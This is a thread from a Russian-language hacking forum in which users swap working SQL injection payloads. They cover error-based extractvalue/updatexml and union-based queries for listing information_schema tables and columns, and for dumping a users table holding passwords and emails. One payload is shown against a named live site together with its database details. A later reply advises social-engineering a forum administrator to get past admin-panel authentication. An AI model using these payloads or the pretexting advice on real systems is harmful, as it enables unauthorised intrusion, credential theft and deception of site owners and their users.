 |
|
27.08.2016, 19:12
|
|
Новичок
Регистрация: 27.08.2016
Сообщений: 16
С нами:
5111606
Репутация:
0
|
|
Не много запутался) есть уязвимость:
Код:
http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version()),1)*'
version (5.1.69)а как мне вывести таблицы с information_schema....
P.S совсем башка не варит, колят магнезию( |
|
|
27.08.2016, 19:34
|
|
Новичок
Регистрация: 14.08.2016
Сообщений: 17
С нами:
5130326
Репутация:
0
|
|
Сообщение от NonBlizz
↑
Не много запутался) есть уязвимость:
Код:
http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version()),1)*'
version
(5.1.69)
а как мне вывести таблицы с information_schema....
P.S совсем башка не варит, колят магнезию(
extractvalue(rand(),concat(0x3a,(select+concat(0x3 a,table_name)+from+information_schema.tables+limit +0,1)))+--+
|
|
|
|
28.08.2016, 01:46
|
|
Новичок
Регистрация: 27.08.2016
Сообщений: 16
С нами:
5111606
Репутация:
0
|
|
Код:
http://www.site.ru/pis.php/view/(2)union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3)
Вывел таблицы с БД.
Допустим есть таблица pwd.pwd-users c колонками pass,uname,email как мне вывести их содержимое за помощь ++
P.S Магнезия всё ещё долбит по шарам=) |
|
|
|
28.08.2016, 03:00
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от NonBlizz
↑
Код:
http://www.site.ru/pis.php/view/(2)union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3)
Вывел таблицы с БД.
Допустим есть таблица pwd.pwd-users c колонками pass,uname,email как мне вывести их содержимое за помощь ++
P.S Магнезия всё ещё долбит по шарам=)
select concat(pass,uname,email) from pwd.pwd-users
|
|
|
|
28.08.2016, 09:06
|
|
Новичок
Регистрация: 27.08.2016
Сообщений: 16
С нами:
5111606
Репутация:
0
|
|
Сообщение от BabaDook
↑
select concat(pass,uname,email) from pwd.pwd-users
Я уже так пробовал)) итог пустая страница, с from pwd.pwd-user limit 1,1 тоже
Точнее не то чтобы пустая страница, а просто не выводит инфу.
from pwd.pwd-user идёт же перед 3) ?
|
|
|
|
28.08.2016, 09:32
|
|
Новичок
Регистрация: 27.08.2016
Сообщений: 16
С нами:
5111606
Репутация:
0
|
|
Другой вектор error-based пробуй.
Код:
http://www.legalsteroid.ru/'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
version: 5.5.50-MariaDB
user: steroid_legal@localhost
database: steroid_legal
Дальше поймёшь?
|
|
|
|
29.08.2016, 02:26
|
|
Новичок
Регистрация: 27.08.2016
Сообщений: 16
С нами:
5111606
Репутация:
0
|
|
Код:
http://site.ru/info/1'or(ExtractValue(1,concat(0x3a,(select(database())))))='1
Выводит...
Подскажите как извлечь инфу из Information.schema.. На примере этого запроса...
Пробывал так:
Код:
http://site.ru/info/1'or(extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))+--+
выводит такую ошибку:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+information_schema.tables+limit+0,1)))+--+') = 0 ) OR baner.id_baner IN (SE' at line 1
При запросе:
Код:
http://site.ru/info/1'and(extractvalue(1,concat(0x3a,(select(table_name)from(information_schema.tables)))))='1
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row
Шо не так делаю? |
|
|
|
29.08.2016, 16:26
|
|
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами:
5785526
Репутация:
6
|
|
есть форум на булке,так же есть данные админа,на форуме получается залогиниться,но когда перехожу по адресу site.ru/forum/admincp/ ,там стоит бейсик авторизация,можно как то ее обойти?
|
|
|
|
29.08.2016, 17:30
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от R3hab
↑
есть форум на булке,так же есть данные админа,на форуме получается залогиниться,но когда перехожу по адресу site.ru/forum/admincp/ ,там стоит бейсик авторизация,можно как то ее обойти?
засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
|
|
|
|
29.08.2016, 18:01
|
|
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами:
5785526
Репутация:
6
|
|
Сообщение от Konqi
↑
засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
то есть пароль от форума и админки могут отличатся?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
